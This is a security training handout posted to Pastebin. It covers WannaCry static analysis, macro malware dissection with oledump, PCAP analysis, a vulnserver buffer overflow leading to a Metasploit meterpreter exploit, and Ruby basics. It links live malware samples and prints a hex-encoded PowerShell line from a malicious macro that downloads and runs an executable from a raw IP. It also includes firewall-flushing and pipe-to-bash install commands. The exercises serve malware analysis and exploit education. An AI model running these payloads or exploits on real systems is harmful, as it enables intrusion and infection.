Advertisement
joemccray

Norway Security Class

Sep 12th, 2018
1,835
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 72.15 KB | None | 0 0
  1. ############################
  2. # Setup your CentOS 7 host #
  3. ############################
  4. yum update
  5. yum install -y nmap python2-scapy.noarch python34-scapy.noarch whois.x86_64 tcpdump.x86_64 unzip wget tcpflow.x86_64
  6.  
  7.  
  8.  
  9. ################
  10. # The Scenario #
  11. ################
  12. You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
  13.  
  14.  
  15. The fastest thing you can do is perform static analysis.
  16.  
  17.  
  18.  
  19. ###################
  20. # Static Analysis #
  21. ###################
  22.  
  23. - After logging please open a terminal window and type the following commands:
  24.  
  25.  
  26. ---------------------------Type This-----------------------------------
  27. mkdir malware_analysis
  28.  
  29. cd malware_analysis
  30.  
  31. wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
  32.  
  33. unzip wannacry.zip
  34. infected
  35.  
  36. file wannacry.exe
  37.  
  38. mv wannacry.exe malware.pdf
  39.  
  40. file malware.pdf
  41.  
  42. mv malware.pdf wannacry.exe
  43.  
  44. hexdump -n 2 -C wannacry.exe
  45.  
  46. ----------------------------------------------------------------------
  47.  
  48.  
  49. ***What is '4d 5a' or 'MZ'***
  50. Reference:
  51. http://www.garykessler.net/library/file_sigs.html
  52.  
  53.  
  54.  
  55.  
  56. ---------------------------Type This-----------------------------------
  57. objdump -x wannacry.exe
  58.  
  59. strings wannacry.exe
  60.  
  61. strings --all wannacry.exe | head -n 6
  62.  
  63. strings wannacry.exe | grep -i dll
  64.  
  65. strings wannacry.exe | grep -i library
  66.  
  67. strings wannacry.exe | grep -i reg
  68.  
  69. strings wannacry.exe | grep -i key
  70.  
  71. strings wannacry.exe | grep -i rsa
  72.  
  73. strings wannacry.exe | grep -i open
  74.  
  75. strings wannacry.exe | grep -i get
  76.  
  77. strings wannacry.exe | grep -i mutex
  78.  
  79. strings wannacry.exe | grep -i irc
  80.  
  81. strings wannacry.exe | grep -i join
  82.  
  83. strings wannacry.exe | grep -i admin
  84.  
  85. strings wannacry.exe | grep -i list
  86. ----------------------------------------------------------------------
  87.  
  88.  
  89.  
  90.  
  91.  
  92.  
  93.  
  94.  
  95.  
  96.  
  97. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
  98.  
  99. Quick Google search for "wannacry ransomeware analysis"
  100.  
  101.  
  102. Reference
  103. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  104.  
  105. - Yara Rule -
  106.  
  107.  
  108. Strings:
  109. $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
  110. $s2 = “Wanna Decryptor” wide ascii nocase
  111. $s3 = “.wcry” wide ascii nocase
  112. $s4 = “WANNACRY” wide ascii nocase
  113. $s5 = “WANACRY!” wide ascii nocase
  114. $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
  115.  
  116.  
  117.  
  118.  
  119.  
  120.  
  121.  
  122.  
  123. Ok, let's look for the individual strings
  124.  
  125.  
  126. ---------------------------Type This-----------------------------------
  127. strings wannacry.exe | grep -i ooops
  128.  
  129. strings wannacry.exe | grep -i wanna
  130.  
  131. strings wannacry.exe | grep -i wcry
  132.  
  133. strings wannacry.exe | grep -i wannacry
  134.  
  135. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
  136. ----------------------------------------------------------------------
  137.  
  138.  
  139.  
  140.  
  141.  
  142.  
  143. ####################################
  144. # Tired of GREP - let's try Python #
  145. ####################################
  146. Decided to make my own script for this kind of stuff in the future. I
  147.  
  148. Reference1:
  149. https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
  150.  
  151. This is a really good script for the basics of static analysis
  152.  
  153. Reference:
  154. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
  155.  
  156.  
  157. This is really good for showing some good signatures to add to the Python script
  158.  
  159.  
  160. Here is my own script using the signatures (started this yesterday, but still needs work):
  161. https://pastebin.com/guxzCBmP
  162.  
  163.  
  164.  
  165. ---------------------------Type This-----------------------------------
  166. wget https://files.pythonhosted.org/packages/ed/cc/157f20038a80b6a9988abc06c11a4959be8305a0d33b6d21a134127092d4/pefile-2018.8.8.tar.gz
  167. tar -zxvf pefile-2018.8.8.tar.gz
  168. cd pefile-2018.8.8
  169. python setup.py install
  170. cd ..
  171.  
  172.  
  173.  
  174. wget https://pastebin.com/raw/guxzCBmP
  175.  
  176.  
  177. mv guxzCBmP am.py
  178.  
  179.  
  180. vi am.py
  181.  
  182. python am.py wannacry.exe
  183. ----------------------------------------------------------------------
  184.  
  185.  
  186.  
  187.  
  188. #####################################################
  189. # Analyzing Macro Embedded Malware #
  190. # Reference: #
  191. # https://jon.glass/analyzes-dridex-malware-p1/ #
  192. #####################################################
  193. ---------------------------Type This-----------------------------------
  194. yum -y install epel-release
  195. yum -y install python-pip
  196. pip install -U olefile
  197.  
  198.  
  199. mkdir oledump
  200.  
  201. cd oledump
  202.  
  203. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  204.  
  205. unzip oledump_V0_0_22.zip
  206.  
  207. wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
  208.  
  209. unzip 064016.zip
  210. infected
  211.  
  212. python oledump.py 064016.doc
  213.  
  214. python oledump.py 064016.doc -s A4 -v
  215. -----------------------------------------------------------------------
  216.  
  217.  
  218.  
  219. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  220. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  221.  
  222. ---------------------------Type This-----------------------------------
  223. python oledump.py 064016.doc -s A5 -v
  224. -----------------------------------------------------------------------
  225.  
  226. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  227.  
  228. ---------------------------Type This-----------------------------------
  229. python oledump.py 064016.doc -s A3 -v
  230.  
  231. - Look for "GVhkjbjv" and you should see:
  232.  
  233. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  234.  
  235. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  236. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  237.  
  238.  
  239.  
  240. ----------------------------------------------------------------------------------------------------------------------------
  241. ##################################
  242. # PCAP Analysis with ChaosReader #
  243. # Note: run as regular user #
  244. ##################################
  245. ---------------------------Type This-----------------------------------
  246. cd ~
  247.  
  248. mkdir -p pcap_analysis/chaos_reader/
  249.  
  250. cd ~/pcap_analysis/chaos_reader/
  251.  
  252. wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
  253.  
  254. wget https://s3.amazonaws.com/infosecaddictsfiles/chaosreader.pl
  255.  
  256. perl chaosreader.pl suspicious-time.pcap
  257.  
  258. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  259.  
  260. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  261.  
  262.  
  263. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  264.  
  265. /sbin/iptables -F
  266.  
  267. python -m SimpleHTTPServer
  268. ****** Open a web browser and browse the the IP address of your Linux machine port 8000 for the web page *****
  269.  
  270. ------------------------------------------------------------------------
  271. ###########################
  272. # Setting up your machine #
  273. ###########################
  274.  
  275. ---------------------------Type This-----------------------------------
  276. yum -y groupinstall 'Development Tools'
  277. yum install -y libpcap-devel.i686 libpcap-devel.x86_64 libpcap.i686 libpcap.x86_64 pcapy.x86_64 p0f.x86_64 perl tcpdump python-docutils git gcc pcre-devel.i686 pcre-devel.x86_64 glibc-static
  278.  
  279. cd ~/pcap_analysis/
  280. git clone git://github.com/gamelinux/prads.git
  281. cd prads
  282. make
  283. make install
  284.  
  285. wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
  286.  
  287. prads -r suspicious-time.pcap -l prads-asset.log
  288.  
  289. cat prads-asset.log | less
  290. ------------------------------------------------------------------------
  291.  
  292. ###############################
  293. # Creating a Malware Database #
  294. ###############################
  295. Creating a malware database (mysql)
  296. -----------------------------------
  297. - Step 1: Installing MySQL database
  298. - Run the following command in the terminal:
  299. ---------------------------Type This-----------------------------------
  300. yum install -y mariadb-server MySQL-python.x86_64 mysql-connector-python.noarch python2-PyMySQL.noarch mariadb.x86_64 mariadb-devel.x86_64 mariadb-libs.x86_64
  301. ------------------------------------------------------------------------
  302.  
  303. - Step 2: Configure the database to accept large files by adding 'max_allowed_packet = 16M' to the /etc/my.cnf file
  304. ---------------------------Type This-----------------------------------
  305. vi /etc/my.cnf
  306. max_allowed_packet = 16M
  307. ------------------------------------------------------------------------
  308.  
  309. Step 3: Start MariaDB
  310. - Run the following command in the terminal:
  311. ---------------------------Type This-----------------------------------
  312. systemctl enable mariadb
  313. systemctl start mariadb
  314. ------------------------------------------------------------------------
  315.  
  316. Step 4: Logging in
  317. Run the following command in the terminal:
  318. ---------------------------Type This-----------------------------------
  319. mysql -u root -p (set a password of 'malware')
  320.  
  321. use mysql;
  322. update user SET PASSWORD=PASSWORD("malware") WHERE USER='root';
  323. flush privileges;
  324. create database malware;
  325. grant all on malware.* to 'root' identified by 'malware';
  326. exit;
  327. ------------------------------------------------------------------------
  328.  
  329.  
  330.  
  331. Step 5: Configure the database setup script
  332. ---------------------------Type This-----------------------------------
  333. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
  334.  
  335. vi mal_to_db.py (fill in database connection information)
  336.  
  337. python mal_to_db.py -i
  338. ------------------------------------------------------------------------
  339.  
  340.  
  341. Step 6: check it to see if the files table was created
  342. --------------------------Type This-----------------------------------
  343. mysql -u root -p
  344. malware
  345.  
  346. show databases;
  347.  
  348. use malware;
  349.  
  350. show tables;
  351.  
  352. describe files;
  353.  
  354. exit;
  355.  
  356. ---------------------------------
  357.  
  358.  
  359. Step 7: Now add the malicious file to the DB
  360. ---------------------------Type This-----------------------------------
  361. wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
  362.  
  363. unzip wannacry.zip
  364. infected
  365.  
  366. python mal_to_db.py -f wannacry.exe -u
  367. ------------------------------------------------------------------------
  368.  
  369.  
  370. Step 8: Now check to see if it is in the DB
  371. ---------------------------Type This-----------------------------------
  372. mysql -u root -p
  373. malware
  374.  
  375. mysql> use malware;
  376.  
  377. select id,md5,sha1,sha256,time FROM files;
  378.  
  379. mysql> quit;
  380. ------------------------------------------------------------------------
  381.  
  382.  
  383. -------------------------------------------------
  384. 1. App Type
  385. - Stand Alone
  386. - Client Server (***vulnserver.exe***)
  387. - Web App
  388.  
  389. 2. Input Type
  390. - Stand Alone File/Keyboard/Mouse
  391. - Client Server Logical network port (***9999***)
  392. - Web App Browser
  393.  
  394.  
  395. 3. Map and fuzz app entry points
  396. - Commands, Methods, Verbs, functions, controllers, subroutines
  397. TRUN 2100
  398.  
  399. 4. Isolate the crash
  400. EIP = 39 6F 43 38
  401. 9 o C 8
  402.  
  403. 5. Calculate distance to EIP
  404. 2006
  405.  
  406. 6. Redirect code execution to mem location you control
  407.  
  408. 7. Insert payload (shellcode)
  409. --------------------------------------------------------------
  410.  
  411.  
  412.  
  413.  
  414. #######################
  415. ----------------------------# Exploit Development #----------------------------
  416. #######################
  417.  
  418.  
  419.  
  420. #######################
  421. # VMs for this course #
  422. #######################
  423. https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
  424. username: workshop
  425. password: password
  426.  
  427. https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
  428. user: infosecaddicts
  429. pass: infosecaddicts
  430.  
  431. You don't have to, but you can do the updates in the Win7 VM (yes, it is a lot of updates).
  432.  
  433.  
  434.  
  435.  
  436.  
  437. #######################################################
  438. # Files you may find helpful for learning Exploit Dev #
  439. #######################################################
  440. https://s3.amazonaws.com/secureninja/files/ExploitDevProcessDocs.zip
  441.  
  442.  
  443.  
  444.  
  445.  
  446. #####################################
  447. # Quick Stack Based Buffer Overflow #
  448. #####################################
  449.  
  450. - You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
  451. https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
  452. https://s3.amazonaws.com/infosecaddictsfiles/nc.exe
  453.  
  454.  
  455. - Extract the ExploitLab.zip file to your Desktop
  456.  
  457. - Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  458.  
  459. - Open a new command prompt and type:
  460.  
  461. ---------------------------Type This-----------------------------------
  462.  
  463. nc localhost 9999
  464. --------------------------------------------------------------------------
  465.  
  466. - In the new command prompt window where you ran nc type:
  467. HELP
  468.  
  469. - Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
  470. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  471.  
  472. - Now double-click on 1-simplefuzzer.py
  473. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  474.  
  475.  
  476. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  477.  
  478. - Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  479.  
  480. - Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  481.  
  482. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  483.  
  484. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  485.  
  486. - Calculate the distance to EIP by running script 3-3000chars.py
  487. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  488.  
  489. 4-count-chars-to-EIP.py
  490. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  491. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  492.  
  493. 5-2006char-eip-check.py
  494. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  495.  
  496. 6-jmp-esp.py
  497. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  498.  
  499. 7-first-exploit
  500. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  501.  
  502. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  503.  
  504.  
  505. ------------------------------
  506.  
  507. ---------------------------Type This-----------------------------------
  508.  
  509.  
  510. cd /home/infosecaddicts/toolz/metasploit/modules/exploits/windows/misc
  511.  
  512. vi vulnserv.rb (paste the code into this file)
  513.  
  514.  
  515. cd ~/toolz/metasploit
  516.  
  517. ./msfconsole
  518.  
  519.  
  520.  
  521. use exploit/windows/misc/vulnserv
  522. set PAYLOAD windows/meterpreter/bind_tcp
  523. set RHOST CHANGEME-TO-YOUR-WIN7-IP
  524. set RPORT 9999
  525. exploit
  526. -----------------------------------------------------------------------
  527.  
  528. #########################################
  529. # FreeFloat FTP Server Exploit Analysis #
  530. #########################################
  531.  
  532.  
  533.  
  534. Analyze the following exploit code:
  535. https://www.exploit-db.com/exploits/15689/
  536.  
  537. 1. What is the target platform that this exploit works against?
  538. 2. What is the variable name for the distance to EIP?
  539. 3. What is the actual distance to EIP in bytes?
  540. 4. Describe what is happening in the variable ‘junk2’
  541.  
  542.  
  543.  
  544.  
  545. Analysis of the training walk-through based on EID: 15689:
  546. https://s3.amazonaws.com/infosecaddictsfiles/ff.zip
  547.  
  548.  
  549.  
  550.  
  551. ff1.py
  552. 1. What does the sys module do? Call System Commands
  553. 2. What is sys.argv[1] and sys.argv[2]?
  554. 3. What application entry point is being attacked in this script?
  555.  
  556.  
  557.  
  558. ff2.py
  559. 1. Explain what is happening in lines 18 - 20 doing.
  560. 2. What pattern_create.rb doing and where can I find it?
  561. 3. Why can’t I just double click the file to run this script?
  562.  
  563.  
  564.  
  565. ff3.py
  566. 1. Explain what is happening in lines 17 - to 25?
  567. 2. Explain what is happening in lines 30 - to 32?
  568. 3. Why is everything below line 35 commented out?
  569.  
  570.  
  571.  
  572. ff4.py
  573. 1. Explain what is happening in lines 13 - to 15.
  574. 2. Explain what is happening in line 19.
  575. 3. Why is everything below line 35 commented out?
  576.  
  577.  
  578.  
  579. Ff5.py
  580. 1. Explain what is happening in line 15.
  581. 2. What is struct.pack?
  582. 3. How big is the shellcode in this script?
  583.  
  584.  
  585.  
  586. ff6.py
  587. 1. What is the distance to EIP?
  588. 2. How big is the shellcode in this script?
  589. 3. What is the total byte length of the data being sent to this app?
  590.  
  591.  
  592.  
  593.  
  594. ff7.py
  595. 1. What is a tuple in python?
  596. 2. How big is the shellcode in this script?
  597. 3. Did your app crash in from this script?
  598.  
  599.  
  600.  
  601.  
  602. ff8.py
  603. 1. How big is the shellcode in this script?
  604. 2. What is try/except in python?
  605. 3. What is socket.SOCK_STREAM in Python?
  606.  
  607.  
  608.  
  609. ff9.py
  610. 1. What is going on in lines 19 and 20?
  611. 2. What is the length of the NOPs?
  612. 3. What is socket.SOCK_STREAM in Python?
  613.  
  614.  
  615.  
  616.  
  617. ff010.py
  618. 1. What is going on in lines 18 - 20?
  619. 2. What is going on in lines 29 - 32?
  620. 3. How would a stack adjustment help this script?
  621.  
  622.  
  623.  
  624.  
  625.  
  626.  
  627.  
  628. #################################
  629. # Scripts to install Metasploit #
  630. #################################
  631.  
  632.  
  633. -----------------1st script-------------------------------
  634. #!/bin/bash
  635. # Setup CentOS 7 for Metasploit
  636. ####################################
  637. # Ensure script is running as root #
  638. ####################################
  639. if [[ $EUID -ne 0 ]]; then
  640. echo "This script must be run as root"
  641. exit 1
  642. fi
  643.  
  644.  
  645. ##########################
  646. # Set up the CentOS host #
  647. ##########################
  648. yum update
  649. yum -y groupinstall 'Development Tools'
  650. yum install -y libpcap-devel.i686 libpcap-devel.x86_64 libpcap.i686 libpcap.x86_64 pcapy.x86_64 p0f.x86_64 perl tcpdump python-docutils git gcc pcre-devel.i686 pcre-devel.x86_64 glibc-static nmap python2-scapy.noarch python34-scapy.noarch whois.x86_64 tcpdump.x86_64 unzip wget tcpflow.x86_64 sqlite rubygem-sqlite3 ruby-irb rubygems rubygem-bigdecimal rubygem-rake rubygem-i18n rubygem-bundler ruby-devel libpcap-devel git svn postgresql-server postgresql-devel sqlite-devel git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel
  651. yum -y install epel-release
  652. yum -y install python-pip
  653. pip install -U olefile
  654. yum install yum-utils -y
  655. cd /usr/local/
  656. rm -rf rvm/
  657. yum-builddep -y ruby
  658. gpg2 --keyserver hkp://keys.gnupg.net --recv-keys
  659. command curl -sSL https://rvm.io/mpapis.asc | gpg2 --import -
  660. curl -L get.rvm.io | bash -s stable
  661. source /etc/profile.d/rvm.sh
  662. chmod -R 777 /usr/local/rvm/
  663. rvm install "ruby-2.5.1"
  664. gem install rails
  665. bundle install
  666.  
  667. -------------------------2nd script-----user script-----------------------------------------------------------------------
  668.  
  669.  
  670. #!/bin/bash
  671.  
  672. # Setup CentOS 7 for Metasploit
  673. ########################################
  674. # Ensure script is NOT running as root #
  675. ########################################
  676. if [ $UID -eq 0 ] ; then
  677. echo "This script must NOT be run as root"
  678. echo "Make sure you are a regular user in your home directory when you run this script"
  679. exit 1
  680. fi
  681.  
  682.  
  683. cd ~
  684. rm -rf .rvm/
  685. rm -rf metasploit-framework/
  686. git clone git://github.com/rapid7/metasploit-framework.git
  687. cd metasploit-framework/
  688. gpg2 --keyserver hkp://keys.gnupg.net --recv-keys
  689. command curl -sSL https://rvm.io/mpapis.asc | gpg2 --import -
  690. cd metasploit-framework/
  691. curl -L get.rvm.io | bash -s stable
  692. cd metasploit-framework/
  693. source /etc/profile.d/rvm.sh
  694. rvm install "ruby-2.5.1"
  695. gem install rails
  696. gem install rake
  697. gem install rex-ole
  698. bundle install
  699. ./msfconsole
  700.  
  701.  
  702. -------------------------------------------------------------------------------------------------------------
  703.  
  704. ############################
  705. # Day 3: Ruby Fundamentals #
  706. ############################
  707.  
  708.  
  709.  
  710. - Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer
  711. scientist and programmer from Japan. It is a cross-platform dynamic language.
  712.  
  713. - The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby
  714. on Rails is a framework that is written in Ruby.
  715.  
  716. - Ruby's file name extensions are .rb and .rbw.
  717.  
  718. - official website of this
  719.  
  720. - language: www.ruby-lang.org.
  721.  
  722.  
  723. - interactive Shell called Ruby Shell
  724.  
  725.  
  726. - Installing and Running IRB
  727.  
  728. ---------------------------Type This-----------------------------------
  729. ruby -v
  730. -----------------------------------------------------------------------
  731.  
  732.  
  733. If you don't have ruby2.3 use the commands below:
  734. -----------------------------------------------------------------------
  735. sudo apt-get install ruby2.3 ruby2.3-dev ruby2.3-doc irb rdoc ri
  736. -----------------------------------------------------------------------
  737.  
  738. - open up the interactive console and play around.
  739.  
  740. ---------------------------Type This-----------------------------------
  741. irb
  742. -----------------------------------------------------------------------
  743.  
  744.  
  745. - Math, Variables, Classes, Creating Objects and Inheritance
  746.  
  747.  
  748. The following arithmetic operators:
  749. Addition operator (+) — 10 + 23
  750. Subtraction operator (-) — 1001 - 34
  751. Multiplication operator (*) — 5 * 5
  752. Division operator (/) — 12 / 2
  753.  
  754.  
  755.  
  756. - Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment
  757. operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by
  758. 30. Again, 69 is assigned to y, and then y is incremented by 33.
  759.  
  760. ---------------------------Type This-----------------------------------
  761. x = 25
  762. x + 30
  763. y = 69
  764. y+33
  765. -----------------------------------------------------------------------
  766.  
  767.  
  768.  
  769. - Let's look at creating classes and creating objects.
  770.  
  771. - Here, the name of the class is Attack. An object has its properties and methods.
  772.  
  773.  
  774. ---------------------------Type This-----------------------------------
  775. class Attack
  776. attr_accessor :of, :sqli, :xss
  777. end
  778. -----------------------------------------------------------------------
  779.  
  780.  
  781. What is nil?
  782. Reference:
  783. https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638
  784.  
  785. nil is the Ruby object that represents nothingness. Whenever a method doesn’t return a useful value, it returns nil. puts and print are methods that return nil:
  786.  
  787. Since the Ruby Console always shows the value of the last statement or expression in your code, if that last statement is print, you’ll see the nil.
  788.  
  789. To prevent the nil from "sticking" to the output of print (which doesn’t insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code, then the Console will show it instead of nil:
  790.  
  791.  
  792.  
  793.  
  794.  
  795. # Now that we have created the classes let's create the objects
  796. ---------------------------Type This-----------------------------------
  797. first_attack = Attack.new
  798. first_attack.of = "stack"
  799. first_attack.sqli = "blind"
  800. first_attack.xss = "dom"
  801. puts first_attack.of
  802. puts first_attack.sqli
  803. puts first_attack.xss
  804. -----------------------------------------------------------------------
  805.  
  806.  
  807.  
  808.  
  809. - Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,
  810. inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which
  811. one object can access the properties/attributes of another object of a different class. Inheritance makes your
  812. programming life easier by maximizing code reuse.
  813.  
  814.  
  815. ---------------------------Type This-----------------------------------
  816. class Exploitframeworks
  817. attr_accessor :scanners, :exploits, :shellcode, :postmodules
  818. end
  819. class Metasploit < Exploitframeworks
  820. end
  821. class Canvas < Exploitframeworks
  822. end
  823. class Coreimpact < Exploitframeworks
  824. end
  825. class Saint < Exploitframeworks
  826. end
  827. class Exploitpack < Exploitframeworks
  828. end
  829. -----------------------------------------------------------------------
  830.  
  831.  
  832.  
  833.  
  834. - Methods, More Objects, Arguments, String Functions and Expression Shortcuts
  835.  
  836. - Let's create a simple method. A method is used to perform an action and is generally called with an object.
  837.  
  838. - Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,
  839. it will print this string: "We are Learning how to PenTest"
  840.  
  841. - An object named 'bo' is created, which is used to call the method.
  842.  
  843.  
  844. ---------------------------Type This-----------------------------------
  845. class Msfnl
  846. def learning
  847. puts "We are Learning how to PenTest"
  848. end
  849. end
  850. -----------------------------------------------------------------------
  851.  
  852. #Now let's define an object for our Method
  853.  
  854. ---------------------------Type This-----------------------------------
  855. joe = Msfnl.new
  856. joe.learning
  857. -----------------------------------------------------------------------
  858.  
  859.  
  860.  
  861. - An argument is a value or variable that is passed to the function while calling it. In the following example, while
  862. calling the puts() function, we are sending a string value to the function. This string value is used by the
  863. function to perform some particular operations.
  864.  
  865. puts ("Pentesting")
  866.  
  867.  
  868. - There are many useful string functions in Ruby. String functions make it easy to work with strings. Now, we will
  869. explain some useful string functions with an example.
  870.  
  871. - The length function calculates the length of a string. The upcase function converts a string to uppercase. And the
  872. reverse function reverses a string. The following example demonstrates how to use the string functions.
  873.  
  874. ---------------------------Type This-----------------------------------
  875. 55.class
  876. "I Love Programming".class
  877. "I Love Pentesting".length
  878. "Pown that box".upcase
  879. "Love" + "To Root Boxes"
  880. "evil".reverse
  881. "evil".reverse.upcase
  882. -----------------------------------------------------------------------
  883.  
  884.  
  885. - expressions and shortcuts. In the below example, 'a' is an operand, '3' is an operand, '=' is
  886. an operator, and 'a=3' is the expression. A statement consists of one or multiple expressions. Following are the
  887. examples of some expressions.
  888.  
  889. ---------------------------Type This-----------------------------------
  890. a = 3
  891. b = 6
  892. a+b+20
  893. d = 44
  894. f = d
  895. puts f
  896. -----------------------------------------------------------------------
  897.  
  898.  
  899.  
  900.  
  901.  
  902. - shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated
  903. assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following
  904. statements to understand the shortcuts.
  905.  
  906. ---------------------------Type This-----------------------------------
  907. g = 70
  908. g = g+44
  909. g += 33
  910. -----------------------------------------------------------------------
  911.  
  912.  
  913. - In the above statement, g is incremented by 33 and then the total value is assigned to g.
  914.  
  915.  
  916.  
  917. ---------------------------Type This-----------------------------------
  918. g *= 3
  919. -----------------------------------------------------------------------
  920.  
  921.  
  922. - In the above statement, g is multiplied with 3 and then assigned to g.
  923.  
  924. - Example
  925.  
  926. - Comparison Operators, Loops, Data Types, and Constants
  927.  
  928. - Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
  929. how to use the following comparison operators.
  930.  
  931. 'Less than' operator (<): This operator is used to check whether a variable or constant is less than another
  932. variable or constant. If it's less than the other, the 'less than' operator returns true.
  933.  
  934. 'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable
  935. or constant. If it's equal to the other, the 'equal to' operator returns true.
  936.  
  937. 'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another
  938. variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.
  939.  
  940. ---------------------------Type This-----------------------------------
  941. numberofports = 55
  942. puts "number of ports found during scan" if numberofports < 300
  943. numberofports = 400
  944. puts "number of ports found during scan" if numberofports < 300
  945. puts "number of ports found during scan" if numberofports == 300
  946. puts "number of ports found during scan" if numberofports != 300
  947. -----------------------------------------------------------------------
  948.  
  949.  
  950.  
  951. Example
  952.  
  953.  
  954. - the 'OR' operator and the 'unless' keyword. This symbol '||' represents the logical 'OR' operator.
  955.  
  956. - This operator is generally used to combine multiple conditions.
  957. - In case of two conditions, if both or any of the conditions is true, the 'OR'operator returns true. Consider the
  958.  
  959. - following example to understand how this operator works.
  960.  
  961. ---------------------------Type This-----------------------------------
  962. ports = 100
  963. puts "number of ports found on the network" if ports<100 || ports>200
  964. puts "number of ports found on the network" if ports<100 || ports>75
  965. -----------------------------------------------------------------------
  966.  
  967. # unless
  968.  
  969. ---------------------------Type This-----------------------------------
  970. portsbelow1024 = 50
  971. puts "If the ports are below 1024" unless portsbelow1024 < 1000
  972. puts "If the ports are below 1024" unless portsbelow1024 < 1055
  973. puts "If the ports are below 1024" unless portsbelow1024 < 20
  974. -----------------------------------------------------------------------
  975.  
  976. - The 'unless' keyword is used to do something programmatically unless a condition is true.
  977.  
  978.  
  979.  
  980. - Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.
  981.  
  982. - See the following example to understand how a string is printed 10 times on the screen using a loop.
  983.  
  984. ---------------------------Type This-----------------------------------
  985. 10.times do puts "infosecaddicts" end
  986. -----------------------------------------------------------------------
  987.  
  988. # Or use the curly braces
  989.  
  990. ---------------------------Type This-----------------------------------
  991. 10.times {puts "infosecaddicts"}
  992. -----------------------------------------------------------------------
  993.  
  994.  
  995. - Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while
  996. working with different data types. Data type conversion is also known as type casting.
  997.  
  998.  
  999.  
  1000. - Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you
  1001. change the value of a constant, you will see a warning message.
  1002.  
  1003.  
  1004.  
